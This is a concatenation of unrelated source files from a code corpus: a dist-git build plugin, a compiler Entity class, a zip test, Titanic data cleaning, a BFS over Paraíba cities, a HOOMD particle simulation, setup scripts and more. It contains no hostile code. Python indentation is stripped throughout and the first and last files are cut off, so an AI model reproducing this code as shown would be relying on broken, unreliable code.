def info():
return "dist-git", "Support for dist-git repositories"
@staticmethod
def inject_args(parser):
parser.add_argument('--dist-git-enable', action='store_true', help='Enables dist-git plugin')
parser.add_argument('--dist-git-assume-yes', action='store_true', help='Skip interactive mode and answer all question with "yes"')
parser.add_argument('--dist-git-scratch', action='store_true', help='Scratch build')
parser.add_argument('--dist-git-tech-preview', action='store_true', help='Change the type of image to tech-preview')
return parser
def __init__(self, dogen, args):
super(DistGitPlugin, self).__init__(dogen, args)
if not self.args.dist_git_enable:
return
self.repo = None
self.branch = None
def prepare(self, cfg):
if not self.args.dist_git_enable:
return
dist_git_cfg = cfg.get('dogen', {}).get('plugins', {}).get('dist_git', None)
if dist_git_cfg:
self.repo = dist_git_cfg.get('repo')
self.branch = dist_git_cfg.get('branch')
if not (self.repo and self.branch):
raise Exception("Dit-git plugin was activated, but repository and branch was not correctly provided")
self.git = Git(self.log, self.output, os.path.dirname(self.descriptor), self.repo, self.branch, self.args.dist_git_assume_yes)
self.git.prepare()
self.git.clean()
def before_sources(self, cfg):
if not self.args.dist_git_enable:
return
if not self.args.dist_git_tech_preview:
return
name = cfg.get('name')
family, name = name.split('/')
tech_preview_name = "%s-tech-preview/%s" % (family, name)
self.log.info("Generating tech-preview image, updating image name to: %s" % tech_preview_name)
cfg['name'] = tech_preview_name
def after_sources(self, files):
if not self.args.dist_git_enable:
return
with Chdir(self.output):
self.update_lookaside_cache(files)
self.git.add()
if self.git.stage_modified():
self.git.commit()
self.git.push()
else:
self.log.info("No changes made to the code, committing skipped")
self.build()
def update_lookaside_cache(self, artifacts):
if not artifacts:
return
self.log.info("Updating lookaside cache...")
subprocess.check_output(["rhpkg", "new-sources"] + artifacts.keys())
self.log.info("Update finished.")
def build(self):
if self.args.dist_git_assume_yes or Tools.decision("Do you want to execute a build on OSBS?"):
self.log.info("Executing container build on OSBS...")
cmd = ["rhpkg", "container-build"]
if self.args.dist_git_scratch:
cmd.append('--scratch')
subprocess.call(cmd)
class Git(object):
"""
Git support for target directories
"""
@staticmethod
def repo_info(path):
with Chdir(path):
if subprocess.check_output(["git", "rev-parse", "--is-inside-work-tree"]).strip() != "true":
raise Exception("Directory %s doesn't seem to be a git repository. Please make sure you specified correct path." % path)
name = os.path.basename(subprocess.check_output(["git", "rev-parse", "--show-toplevel"]).strip())
branch = subprocess.check_output(["git", "rev-parse", "--abbrev-ref", "HEAD"]).strip()
commit = subprocess.check_output(["git", "rev-parse", "HEAD"]).strip()
return name, branch, commit
def __init__(self, log, output, source, repo, branch, noninteractive=False):
self.log = log
self.output = output
self.repo = repo
self.branch = branch
self.dockerfile = os.path.join(self.output, "Dockerfile")
self.noninteractive = noninteractive
self.source_repo_name, self.source_repo_branch, self.source_repo_commit = Git.repo_info(source)
def stage_modified(self):
# Check if there are any files in stage (return code 1). If there are no files
# (return code 0) it means that this is a rebuild, so skip committing
if subprocess.call(["git", "diff-index", "--quiet", "--cached", "HEAD"]):
return True
return False
def prepare(self):
if os.path.exists(self.output):
with Chdir(self.output):
self.log.info("Pulling latest changes in repo %s..." % self.repo)
subprocess.check_output(["git", "fetch"])
subprocess.check_output(["git", "checkout", "-f", self.branch], stderr=subprocess.STDOUT)
subprocess.check_output(["git", "reset", "--hard", "origin/%s" % self.branch])
self.log.debug("Changes pulled")
else:
self.log.info("Cloning %s git repository (%s branch)..." % (self.repo, self.branch))
subprocess.check_output(["rhpkg", "-q", "clone", "-b", self.branch, self.repo, self.output])
self.log.debug("Repository %s cloned" % self.repo)
def clean(self):
""" Removes old generated scripts, repos and cct directories """
with Chdir(self.output):
for d in ["scripts", "repos", "cct"]:
if os.path.exists(d):
self.log.info("Removing old '%s' directory" % d)
subprocess.check_output(["git", "rm", "-rf", d])
def add(self):
# Add new Dockerfile
subprocess.check_call(["git", "add", "Dockerfile"])
for d in ["scripts", "repos", "cct"]:
if os.path.exists(os.path.join(self.output, d)):
subprocess.check_call(["git", "add", d])
def commit(self):
commit_msg = "Sync"
if self.source_repo_name:
commit_msg += " with %s" % self.source_repo_name
if self.source_repo_commit:
commit_msg += ", commit %s" % self.source_repo_commit
# Commit the change
self.log.info("Commiting with message: '%s'" % commit_msg)
subprocess.check_output(["git", "commit", "-q", "-m", commit_msg])
untracked = subprocess.check_output(["git", "ls-files", "--others", "--exclude-standard"])
if untracked:
self.log.warn("There are following untracked files: %s. Please review your commit." % ", ".join(untracked.splitlines()))
diffs = subprocess.check_output(["git", "diff-files", "--name-only"])
if diffs:
self.log.warn("There are uncommited changes in following files: '%s'. Please review your commit." % ", ".join(diffs.splitlines()))
if not self.noninteractive:
subprocess.call(["git", "status"])
subprocess.call(["git", "show"])
if not (self.noninteractive or Tools.decision("Are you ok with the changes?")):
subprocess.call(["bash"])
def push(self):
if self.noninteractive or Tools.decision("Do you want to push the commit?"):
print("")
self.log.info("Pushing change to the upstream repository...")
subprocess.check_output(["git", "push", "-q"])
self.log.info("Change pushed.")
| 2.1875
| 2
|
cpc/entity/Entity.py
|
U-Ar/Cpresto
| 1
|
12784770
|
from abc import ABCMeta,abstractmethod
from abst.Dumpable import Dumpable
class Entity(Dumpable):
def __init__(self,priv,t,name):
self._name = name
self._is_private = priv
self._type_node = t
self.n_refered = 0
self._memref = None
self._address = None
def name(self):
return self._name
def symbol_string(self):
return self._name
@abstractmethod
def is_defined(self):
pass
@abstractmethod
def is_initialized(self):
pass
def is_constant(self):
return False
def value(self):
raise Exception("Entity.value()")
def is_parameter(self):
return False
def is_private(self):
return self._is_private
def type_node(self):
return self._type_node
def type(self):
return self._type_node.type()
def alloc_size(self):
return self.type().alloc_size()
def alignment(self):
return self.type().alignment()
def refered(self):
self.n_refered += 1
def is_refered(self):
return self.n_refered > 0
def set_memref(self,mem):
self._memref = mem
def memref(self):
self.check_address()
return self._memref
def set_address(self,mem):
self._address = mem
def address(self):
self.check_address()
return self._address
def check_address(self):
if self._memref == None and self._address == None:
raise Exception("address did not resolved: "+self._name)
def location(self):
return self._type_node.location()
@abstractmethod
def accept(self,visitor):
pass
def dump(self,dumper):
dumper.print_class(self,self.location())
self._dump(dumper)
@abstractmethod
def _dump(self,dumper):
pass
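# A minimal concrete subclass sketch, for illustration only (not part of Cpresto;
# the visitor and dumper calls are assumptions):
#   class IllustrativeVariable(Entity):
#       def is_defined(self): return True
#       def is_initialized(self): return True
#       def accept(self, visitor): return visitor.visit(self)   # visitor API assumed
#       def _dump(self, dumper): pass   # dump subclass-specific members here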
| 3.1875
| 3
|
usaspending_api/download/tests/unit/test_zip_file.py
|
g4brielvs/usaspending-api
| 217
|
12784771
|
<filename>usaspending_api/download/tests/unit/test_zip_file.py
import os
import zipfile
from tempfile import NamedTemporaryFile
from usaspending_api.download.filestreaming.zip_file import append_files_to_zip_file
def test_append_files_to_zip_file():
with NamedTemporaryFile() as zip_file:
with NamedTemporaryFile() as include_file_1:
with NamedTemporaryFile() as include_file_2:
include_file_1.write(b"this is a test")
include_file_1.flush()
include_file_2.write(b"this is also a test")
include_file_2.flush()
append_files_to_zip_file([include_file_1.name, include_file_2.name], zip_file.name)
with zipfile.ZipFile(zip_file.name, "r") as zf:
assert [z.filename for z in zf.filelist] == [
os.path.basename(include_file_1.name),
os.path.basename(include_file_2.name),
]
| 3.09375
| 3
|
data_model.py
|
SinaKhorami/Titanic-Survival-Prediction
| 0
|
12784772
|
<reponame>SinaKhorami/Titanic-Survival-Prediction
#author: <NAME>
#date: Tue 29 Nov 2016
import numpy as np
import pandas as pd
class Data():
"""docstring for Data"""
def __init__(self):
self.train_df = pd.read_csv('data/train.csv', header = 0)
self.test_df = pd.read_csv('data/test.csv', header = 0)
def getCleanData(self):
self.featureCreation()
self.featureImprovement()
self.featureSelection()
return self.train_df.values, self.test_df.values
def featureCreation(self):
self.train_df['Gender'] = self.train_df['Sex'].map( {'female': 0, 'male': 1} ).astype(int)
self.train_df['FamilySize'] = self.train_df['SibSp'] + self.train_df['Parch']
self.test_df['Gender'] = self.test_df['Sex'].map( {'female': 0, 'male': 1} ).astype(int)
self.test_df['FamilySize'] = self.test_df['SibSp'] + self.test_df['Parch']
def featureImprovement(self):
train_median_ages, test_median_ages = self.getMedianAgesByGenderAndPclass()
self.train_df['AgeNotNan'] = self.train_df['Age']
self.test_df['AgeNotNan'] = self.test_df['Age']
for i in range(0, 2):
for j in range(0, 3):
self.train_df.loc[(self.train_df['Age'].isnull()) & (self.train_df['Gender'] == i) & \
(self.train_df['Pclass'] == j+1), 'AgeNotNan'] = train_median_ages[i, j]
self.test_df.loc[(self.test_df['Age'].isnull()) & (self.test_df['Gender'] == i) & \
(self.test_df['Pclass'] == j+1), 'AgeNotNan'] = test_median_ages[i, j]
self.train_df['Age'] = self.train_df['AgeNotNan']
self.test_df['Age'] = self.test_df['AgeNotNan']
self.train_df.loc[(self.train_df['Fare'].isnull()), 'Fare'] = self.train_df['Fare'].median()
self.test_df.loc[(self.test_df['Fare'].isnull()), 'Fare'] = self.test_df['Fare'].median()
def featureSelection(self):
drop_elements = ['PassengerId', 'Name', 'Sex', 'Ticket', 'Cabin',\
'AgeNotNan', 'Embarked', 'SibSp', 'Parch']
self.train_df = self.train_df.drop(drop_elements, axis = 1)
self.test_df = self.test_df.drop(drop_elements, axis = 1)
def getMedianAgesByGenderAndPclass(self):
train_median_ages = np.zeros((2, 3))
test_median_ages = np.zeros((2, 3))
for i in range(0, 2):
for j in range(0, 3):
train_median_ages[i, j] = self.train_df[(self.train_df['Gender'] == i) & \
(self.train_df['Pclass'] == j+1)]['Age'].dropna().median()
test_median_ages[i, j] = self.test_df[(self.test_df['Gender'] == i) & \
(self.test_df['Pclass'] == j+1)]['Age'].dropna().median()
return train_median_ages, test_median_ages
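# A minimal usage sketch (assumes data/train.csv and data/test.csv exist as loaded above):
#   data = Data()
#   train_values, test_values = data.getCleanData()
#   print(train_values.shape, test_values.shape)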
| 3.234375
| 3
|
100DaysOfDays/Dia01/ex04.py
|
giselemanuel/programming-challenges
| 0
|
12784773
|
"""
Dissecando uma variável:
Faça um programa que leia algo pelo teclado e mostre na tela o
seu tipo primitivo e todas as informações possíveis sobre ele.
"""
print("-------- DISSECANDO UMA VARIÁVEL --------")
entrada = input("Digite algo: ")
print("O tipo primitivo deste valor é: ", type(entrada))
print("Só tem espaços.", entrada.isspace())
print("É um número: ", entrada.isnumeric())
print("Esta em minuscúla: ", entrada.islower())
print("Esta em maiuscúla: ", entrada.isupper())
print("Esta capitalizada: ", entrada.title())
| 4.40625
| 4
|
migration_test.py
|
MathiasSeguy-Android2EE/MigrationProjetsA2ee
| 2
|
12784774
|
from sys import path, stdout
path.insert(0, './git_management')
path.insert(0, './gradle_management')
from git_management import git_init
from gradle_management import migrateFromEclipseToAS
from os import path
from os import scandir
from os import remove
import migration
import errno, os, stat, shutil
import subprocess
from ownStyle import GREEN,BLUE,BOLD,GREEN,RED,RESET,CYAN
from shutil import copytree, ignore_patterns
from colorama import init,deinit
def cleanAmberProject(sourceDirectory):
for file in scandir(sourceDirectory):
if path.isdir(file):
cleanAmberProject(file)
else:
if "AmberProblem.txt" in file.name:
os.remove(file)
#Code of the class
init()
#Constants: Application under test
ActionBarCompatSampleDir='D:\\Git\\FormationAndroid2ee\\Formation_ICS_AS\\ActionBarCompatSample'
AmberDir='D:\\Git\\MyProjets\\AmberTeam'
ChronoDir='D:\\Git\\FormationAndroid2ee\\FormationInitiale_InitGui_AS\\ChronoTuto'
ForecastDir='D:\\Git\\MyProjets\\ForecastYahooRest\\ForecastRestWithLibs'
MyLightDir='D:\\Git\\MyProjets\\MyLight'
FtagDir='D:\\Git\\ProjetsExternes\\Tag\\ft_ag_app'
ActionBarCompatSampleTarget='D:\\Git\\Temp\\Res\\ActionBarCompatSample'
AmberTarget='D:\\Git\\Temp\\Res\\AmberTeam'
ChronoTarget='D:\\Git\\Temp\\Res\\ChronoTuto'
ForecastTarget='D:\\Git\\Temp\\Res\\ForecastRestWithLibs'
MyLightTarget='D:\\Git\\Temp\\Res\\MyLight'
FtagTarget='D:\\Git\\Temp\\Res\\ft_ag_app'
#Launch your test on your targets
print(BLUE+"#############################################")
print(GREEN+"#############################################")
print(RED+"#############################################")
print(CYAN+"#############################################")
print(BOLD+"Starting the migration of the elements")
print(BLUE+"#############################################")
print(GREEN+"#############################################")
print(RED+"#############################################")
print(CYAN+"#############################################\n\n")
errorFound=['list of errors']
successFound=['list of working project']
# cleanAmberProject(AmberDir)
# launchTest(FtagDir,FtagTarget)
result=migration.migrate(ActionBarCompatSampleDir,ActionBarCompatSampleTarget)#Works fine
successFound=successFound+result[0]
errorFound=errorFound+result[1]
result=migration.migrate(AmberDir,AmberTarget)#Failed: AndroidxMigration failed with android.support.design and projectName and myGradleGroupd are Res :(
successFound=successFound+result[0]
errorFound=errorFound+result[1]
result=migration.migrate(ChronoDir,ChronoTarget)#Fine
successFound=successFound+result[0]
errorFound=errorFound+result[1]
result=migration.migrate(ForecastDir,ForecastTarget)#Could not find unknown properties versionCode
successFound=successFound+result[0]
errorFound=errorFound+result[1]
result=migration.migrate(MyLightDir,MyLightTarget)#Fine
successFound=successFound+result[0]
errorFound=errorFound+result[1]
print(BLUE+'final result :')
#https://stackoverflow.com/questions/37340049/how-do-i-print-colored-output-to-the-terminal-in-python/37340245
for elem in successFound:
print(GREEN+elem)
for elem in errorFound:
print(RED+elem)
print(RESET)
deinit()
#This is the step2:Pushing every one in GitHub
# git_init.gitInit(targetDir)
| 2
| 2
|
main.py
|
dz-s/dejavu
| 0
|
12784775
|
from pydub import AudioSegment
import parselmouth
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
def draw_pitch(pitch):
# Extract selected pitch contour, and
# replace unvoiced samples by NaN to not plot
pitch_values = pitch.selected_array['frequency']
pitch_values[pitch_values == 0] = np.nan
plt.plot(pitch.xs(), pitch_values, 'o', markersize=5, color='w')
plt.plot(pitch.xs(), pitch_values, 'o', markersize=2)
plt.grid(False)
plt.ylim(0, pitch.ceiling)
plt.ylabel("fundamental frequency [Hz]")
def draw_spectrogram(spectrogram, dynamic_range=70):
X, Y = spectrogram.x_grid(), spectrogram.y_grid()
sg_db = 10 * np.log10(spectrogram.values)
plt.pcolormesh(X, Y, sg_db, vmin=sg_db.max() -
dynamic_range, cmap='afmhot')
plt.ylim([spectrogram.ymin, spectrogram.ymax])
plt.xlabel("time [s]")
plt.ylabel("frequency [Hz]")
def draw_intensity(intensity):
plt.plot(intensity.xs(), intensity.values.T, linewidth=3, color='w')
plt.plot(intensity.xs(), intensity.values.T, linewidth=1)
plt.grid(False)
plt.ylim(0)
plt.ylabel("intensity [dB]")
if __name__ == '__main__':
sns.set() # Use seaborn's default style to make attractive graphs
# Plot nice figures using Python's "standard" matplotlib library
snd = parselmouth.Sound(
'output.mp3')
# plt.figure()
# plt.plot(snd.xs(), snd.values.T)
# plt.xlim([snd.xmin, snd.xmax])
# plt.xlabel("time [s]")
# plt.ylabel("amplitude")
# # or plt.savefig("sound.png"), or plt.savefig("sound.pdf")
# plt.savefig("sound.png")
pitch = snd.to_pitch()
# If desired, pre-emphasize the sound fragment before calculating the spectrogram
pre_emphasized_snd = snd.copy()
pre_emphasized_snd.pre_emphasize()
spectrogram = pre_emphasized_snd.to_spectrogram(
window_length=0.03, maximum_frequency=8000)
plt.figure()
draw_spectrogram(spectrogram)
plt.twinx()
draw_pitch(pitch)
plt.xlim([snd.xmin, snd.xmax])
plt.savefig("pitch.png")
# sound = AudioSegment.from_mp3(
# '/Users/dimashulhin/Desktop/kyky_original.mp3')
# # get raw audio data as a bytestring
# raw_data = sound.raw_data
# # get the frame rate
# sample_rate = sound.frame_rate
# # get amount of bytes contained in one sample
# sample_size = sound.sample_width
# # get channels
# channels = sound.channels
# beginning = sound[13000:17000]
# print(beginning.raw_data)
| 3.171875
| 3
|
model/engine/inference.py
|
giorgiovaccarino/CSSR
| 0
|
12784776
|
<reponame>giorgiovaccarino/CSSR
import os
from tqdm import tqdm
import torch
import torchvision.transforms as transforms
import numpy as np
import pandas as pd
import wandb
from model.utils.estimate_metrics import PSNR, SSIM, IoU
def inference_for_ss(args, cfg, model, test_loader):
"""
    aiu_scores : test_case(=len(test_loader)) x threshold_case(=99)
"""
global aiu_scores
fnames = []
max_iter = len(test_loader)
psnr_scores = np.array([])
ssim_scores = np.array([])
psnr = PSNR()
ssim = SSIM()
iou = IoU()
os.makedirs(os.path.dirname(os.path.join(args.output_dirname, "images")), exist_ok=True)
os.makedirs(os.path.dirname(os.path.join(args.output_dirname, "masks")), exist_ok=True)
if args.test_aiu:
thresholds = [i*0.01 for i in range(1, 100)]
iou_mode = "AIU"
else:
thresholds = [0.5]
iou_mode = "IoU"
if args.wandb_flag:
# --- wandb setting https://docs.wandb.ai/integrations/pytorch --- #
wandb.init(config=cfg, project=args.wandb_prj_name)
# if args.dataset_cfg == "":
# wandb.init(config=cfg, project=args.wandb_prj_name)
# else:
# wandb.init(config=cfg, project= f"{args.wandb_prj_name}_{args.dataset_cfg}")
wandb.config.update(args)
wandb.run.name = cfg.OUTPUT_DIR.replace("output/", "")
# Magic
wandb.watch(model, log='all')
print('Evaluation Starts')
print(f'Number of test dataset : {len(test_loader) * args.batch_size}')
model.eval()
for iteration, (imgs, sr_targets, masks, fname) in enumerate(test_loader, 1):
fnames += list(fname)
sr_preds, segment_preds = model(imgs)
# SR evaluation
if not cfg.MODEL.SR_SEG_INV and cfg.MODEL.SCALE_FACTOR != 1:
sr_preds[sr_preds>1] = 1 # clipping
sr_preds[sr_preds<0] = 0 # clipping
psnr_scores = np.append(psnr_scores, psnr(sr_preds, sr_targets.to("cuda")))
ssim_scores = np.append(ssim_scores, ssim(sr_preds, sr_targets.to("cuda")))
save_img(args.output_dirname, sr_preds, fname)
else:
psnr_scores = np.append(psnr_scores, 0)
ssim_scores = np.append(ssim_scores, 0)
# Segmentation evaluation
for iou_th in tqdm(thresholds):
segment_preds_bi = (segment_preds.to("cuda") >= torch.Tensor([iou_th]).to("cuda")).float()
# segment_preds_bi, segment_preds_bi_down = up_scale(segment_preds_bi, cfg)
if iou_th * 100 % 10 == 0 or iou_th == 0.01 or iou_th == 0.99:
save_mask(args, segment_preds_bi, fname, iou_th)
if 'iou_scores' in locals():
iou_scores = np.append(iou_scores, iou(segment_preds_bi, masks.to("cuda"))[:, np.newaxis], axis=1)
else:
# print(iou(segment_preds_bi, masks.to("cuda")).shape)
iou_scores = np.copy(iou(segment_preds_bi, masks.to("cuda"))[:, np.newaxis])
if 'aiu_scores' in locals():
aiu_scores = np.append(aiu_scores, iou_scores, axis=0)
else:
aiu_scores = np.copy(iou_scores)
if args.wandb_flag:
# wandb
wandb.log({"PSNR_score": psnr_scores[-1],
"SSIM_score":ssim_scores[-1],
f"{iou_mode}_scores": np.mean(iou_scores),
})
del iou_scores
if iteration % 10 == 0:
print(f"estimation {iteration/max_iter*100:.4f} % finish!")
print(f"PSNR_mean:{np.mean(psnr_scores):.4f} SSIM_mean:{np.mean(ssim_scores):.4f} {iou_mode}_mean:{np.mean(aiu_scores):.4f}")
print(f"estimation finish!!")
print(f"PSNR_mean:{np.mean(psnr_scores):.4f} SSIM_mean:{np.mean(ssim_scores):.4f} {iou_mode}_mean:{np.mean(aiu_scores):.4f} ")
if args.wandb_flag:
wandb.log({"PSNR_score_mean": np.mean(psnr_scores),
"SSIM_score_mean":np.mean(ssim_scores),
f"{iou_mode}_scores_mean": np.mean(aiu_scores),
})
if args.test_aiu:
plot_metrics_th(aiu_scores, thresholds, "IoU")
# save_iou_log(aiu_scores, thresholds, fnames, args.output_dirname) # Output IoU scores as csv file.
def save_img(dirname, sr_preds, fname):
# print(fpath)
for batch_num in range(sr_preds.size()[0]):
if sr_preds.shape[1] == 3:
sr_pred = transforms.ToPILImage(mode='RGB')(sr_preds[batch_num])
elif sr_preds.shape[1] == 1:
sr_pred = transforms.ToPILImage(mode='L')(sr_preds[batch_num])
os.makedirs(os.path.dirname(dirname+f"/images/"), exist_ok=True)
fpath = os.path.join(dirname+f"/images/", f"{fname[batch_num]}")
sr_pred.save(fpath)
def save_mask(args, segment_predss, fname, iou_th, add_path=""):
# print(segment_predss.shape)
for batch_num in range(segment_predss.size()[0]):
th_name = f"th_{iou_th:.2f}"
segment_predss = segment_predss.to("cpu")
segment_preds = transforms.ToPILImage()(segment_predss[batch_num])
os.makedirs(os.path.dirname(os.path.join(args.output_dirname+f"/masks{add_path}/{th_name}/")), exist_ok=True)
mpath = os.path.join(args.output_dirname+f"/masks{add_path}/{th_name}/", f"{fname[batch_num]}".replace("jpg", 'png'))
segment_preds.save(mpath)
def plot_metrics_th(metrics_scores, thresholds, metrics):
metrics_scores = np.mean(metrics_scores, axis=0)
for iou, th in zip(metrics_scores, thresholds):
wandb.log({f"{metrics}(thresholds)": iou,
"thresholds":th,
})
def save_iou_log(aiu_scores, thresholds, fnames, output_dir):
df = pd.DataFrame(aiu_scores, columns=thresholds, index=fnames)
df.to_csv(os.path.join(output_dir, 'iou_log.csv'))
print('IoU log saved!!')
print(df)
| 2.15625
| 2
|
busca_em_largura.py
|
abiassantana/busca-em-largura
| 1
|
12784777
|
graph = {'joao pessoa':['itabaiana', 'campina grande', 'santa rita'],
'itabaiana': ['joao pessoa','campina grande'],
'campina grande': ['joao pessoa','itabaiana','areia','coxixola', 'soledade'],
'santa rita': ['joao pessoa','mamanguape'],
'mamanguape': ['santa rita','guarabira'],
'guarabira':['mamanguape','areia'],
'areia':['guarabira','campina grande'],
'soledade': ['campina grande','picui', 'patos'],
'coxixola': ['campina grande', 'monteiro'],
'picui':['soledade'],
'patos': ['soledade','itaporanga', 'pombal'],
'monteiro': ['coxixola','itaporanga'],
         'pombal': ['patos','catole', 'sousa'],
'itaporanga': ['patos','monteiro','cajazeiras'],
'catole': ['pombal'],
'sousa': ['pombal','cajazeiras'],
'cajazeiras': ['itaporanga', 'sousa']
}
class busca_em_largura(object):
def __init__(self, graph, initial_state, final_state):
self.graph = graph
self.initial_state = initial_state
self.final_state = final_state
self.explored = []
self.bordas = []
    # receives a string corresponding to a point in the graph
    # adds the unexplored neighbouring points to the frontier (bordas)
    def find_borda(self, point):
        for borda in self.graph[point]:
            if borda not in self.bordas:
                if borda not in self.explored:
                    self.bordas.append(borda)
    def explore(self, point):
        self.explored.append(point)
        if point != self.initial_state:
            self.bordas.remove(point)
        self.find_borda(point)
def walk(self):
while self.final_state not in self.explored:
#print(self.bordas)
if len(self.bordas)>0:
self.explore(self.bordas[0])
def search(self):
self.explore(self.initial_state)
self.walk()
print(self.explored)
busca = busca_em_largura(graph,'joao pessoa', 'cajazeiras')
busca.search()
| 3.171875
| 3
|
setup.py
|
ADACS-Australia/PyFHD
| 2
|
12784778
|
from setuptools import setup
setup(
name = "PyFHD",
    version = "1.0",
author = "ADACS - Astronomy Data and Computing Services",
url = "https://github.com/ADACS-Australia/PyFHD",
python_requires=">=3.7",
packages = ['PyFHD'],
    description = 'Python Fast Holographic Deconvolution: A Python package that does efficient image deconvolution for general radio astronomy, fast-mode Epoch of Reionization analysis, and simulation.',
long_description = open("README.md").read(),
long_description_content_type = 'text/markdown',
classifiers = [
"Programming Language :: Python :: 3",
"License :: MIT License",
"Operating System :: OS Independent",
],
entry_points = {
'console_scripts' : ['pyfhd = PyFHD.pyfhd:main'],
}
)
| 1.226563
| 1
|
setup.py
|
flatironinstitute/reactopy
| 7
|
12784779
|
import setuptools
import os
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'reactopya', 'VERSION')) as version_file:
version = version_file.read().strip()
setuptools.setup(
name="reactopya",
version=version,
author="<NAME>",
author_email="<EMAIL>",
description="",
packages=setuptools.find_packages(),
scripts=['bin/reactopya', 'bin/reactopya-server'],
include_package_data=True,
install_requires=[
"jinja2",
"numpy",
"simplejson"
],
classifiers=(
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
)
)
| 1.40625
| 1
|
initialization_routines/initialize_hcp.py
|
kolbt/whingdingdilly
| 4
|
12784780
|
import sys
sys.path.append('/Users/kolbt/Desktop/compiled/hoomd-blue/build')
import hoomd
from hoomd import md
from hoomd import dem
from hoomd import deprecated
import numpy as np
# Simulation box mesh into grid delimit by particle diameter
# list of mesh indices random number generator to select index
# remove index from list once particle is placed
tsteps = 5000000
dump_freq = 10000
part_perc_a = 50
part_frac_a = float(part_perc_a) / float(100)
pe_a = 80
pe_b = 300
phi = 0.6
part_num = 24102
dumps = tsteps/dump_freq
diameter = 1
# find the box parameters
area_part = np.pi * ((float(diameter)/float(2))**2) * part_num
box_area = area_part / phi
side = int(np.sqrt(box_area))
side = 140
#while side % 10 != 0: # this is sub par... fix it
#side += 1 # or just pick part_num so that this is okay
# initialize system randomly
hoomd.context.initialize()
part_num = 13950
part_a = part_num * part_frac_a # get the total number of A particles
part_a = int(part_a)
part_b = part_num - part_a # get the total number of B particles
mid = int(part_a) # starting point for assigning B particles
snap = hoomd.data.make_snapshot(N = part_num,
box = hoomd.data.boxdim(L=side,
dimensions=2),
particle_types = ['A', 'B'])
part = np.zeros((3))
start_y = -69.5 # box is -70:70 for x and y dimensions
sep_row = 0.90 # distance between particles along x axis
sep_col = 0.78 # distance to increment rows (maintains center to center distance)
ith = 0 # particle counter
m = 0 # incrementer for y value
row = 2 # start on an even row (this determines first x placement in row)
# Places particles in lower left quadrant (-70, -70) - (0, 0)
# while loop that increments y value
while 1:
part[0] = start_y + m
n = 0
# while that increments x value (place row at constant height, y value)
while 1:
# ensures rows are offset from one another
if row % 2 == 0:
start_x = -69.50
else:
start_x = -69.05
part[1] = start_x + n
snap.particles.position[ith] = part
snap.particles.typeid[ith] = 0
ith += 1
n += sep_row
# placing into lower left quadrant
if start_x + n > 0:
break
row += 1
m += sep_col
# ensure particles are limited to lower left quadrant
if -69.5 + m > 0:
break
# Places particles in upper right quadrant (0,0) - (70, 70)
m = 0
row = 2
start_y = 0.5
while 1:
part[0] = start_y + m
n = 0
while 1:
if row % 2 == 0:
start_x = 0.5
else:
start_x = 0.95
        part[1] = start_x + n
snap.particles.position[ith] = part
snap.particles.typeid[ith] = 1
ith += 1
n += sep_row
if start_x + n > 70:
break
row += 1
m += sep_col
if start_y + m > 70:
break
print(ith)
print(ith)
# now let's get the quaternion and moment of inertia
thetas = np.random.uniform(0, 2*np.pi, (part_num,)) # generate random angles
quats = np.array([np.cos(thetas/2),
np.zeros_like(thetas),
np.zeros_like(thetas),
np.sin(thetas/2)]).T # generate quaternions from the angles
snap.particles.orientation[:] = quats
inertia = float(1)/float(16)
snap.particles.diameter[:] = 1 # set particle diameters
snap.particles.moment_inertia[:] = (inertia, inertia, 0) # set moment of inertia
snap.particles.types = ['A', 'B'] # or 0, 1 in typeid vernacular
####################################
### NOW SET FORCES / INTEGRATORS ###
####################################
# initialize the system
system = hoomd.init.read_snapshot(snap)
all = hoomd.group.all()
gA = hoomd.group.type(type = 'A', update=True)
gB = hoomd.group.type(type = 'B', update=True)
N = len(all)
part_num = N
Na = len(gA)
Nb = len(gB)
print(part_num)
nl = hoomd.md.nlist.cell()
lj = hoomd.md.pair.lj(r_cut=2**(1/6), nlist=nl)
lj.set_params(mode='shift')
lj.pair_coeff.set('A', 'A', epsilon=1.0, sigma=1.0)
lj.pair_coeff.set('A', 'B', epsilon=1.0, sigma=1.0)
lj.pair_coeff.set('B', 'B', epsilon=1.0, sigma=1.0)
angle = np.random.rand(part_num) * 2 * np.pi # random orientation of each particle
if part_perc_a != 0 and part_perc_a != 100:
activity_a = []
for i in range(0,mid):
x = (np.cos(angle[i])) * pe_a
y = (np.sin(angle[i])) * pe_a
z = 0
tuple = (x, y, z)
activity_a.append(tuple)
activity_b = []
for i in range(mid,part_num):
x = (np.cos(angle[i])) * pe_b
y = (np.sin(angle[i])) * pe_b
z = 0
tuple = (x, y, z)
activity_b.append(tuple)
hoomd.md.force.active(group=gA,
seed=123,
f_lst=activity_a,
rotation_diff=3.0,
orientation_link=False)
hoomd.md.force.active(group=gB,
seed=375,
f_lst=activity_b,
rotation_diff=3.0,
orientation_link=False)
else:
if part_perc_a == 0:
activity_b = []
for i in range(0,part_num):
x = (np.cos(angle[i])) * pe_b
y = (np.sin(angle[i])) * pe_b
z = 0
tuple = (x, y, z)
activity_b.append(tuple)
hoomd.md.force.active(group=gB,
seed=375,
f_lst=activity_b,
rotation_diff=3.0,
orientation_link=False)
else:
activity_a = []
for i in range(0,part_num):
x = (np.cos(angle[i])) * pe_a
y = (np.sin(angle[i])) * pe_a
z = 0
tuple = (x, y, z)
activity_a.append(tuple)
hoomd.md.force.active(group=gA,
seed=123,
f_lst=activity_a,
rotation_diff=3.0,
orientation_link=False)
# minimize for no overlaps
fire=hoomd.md.integrate.mode_minimize_fire(group=all,
dt=0.00001,
ftol=1e-2,
Etol=1e-7)
hoomd.run(1000)
# brownian integration
hoomd.md.integrate.mode_standard(dt=0.000002)
bd = hoomd.md.integrate.brownian(group=all, kT=0.5, seed=123)
bd.set_gamma('A', gamma=1.0)
bd.set_gamma_r('A', gamma_r=1.0)
#write dump
hoomd.dump.gsd("hcp_test.gsd", period=1000, group=all, overwrite=True, static=[])
#run
hoomd.run(tsteps)
| 2.328125
| 2
|
tests/client/test_tracer.py
|
bernhardkaindl/pjrpc
| 0
|
12784781
|
<gh_stars>0
import json
from xjsonrpc.common import BatchRequest, BatchResponse, Request, Response
from xjsonrpc import client
import pytest
@pytest.mark.parametrize(
'req, resp, exc', [
(
Request(id=1, method='method', params=[1, '2']),
Response(id=1, result='result'),
None,
),
(
BatchRequest(Request(id=1, method='method', params=[1, '2'])),
BatchResponse(Response(id=1, result='result')),
None,
),
(
BatchRequest(Request(id=1, method='method', params=[1, '2'])),
None,
BaseException(),
),
],
)
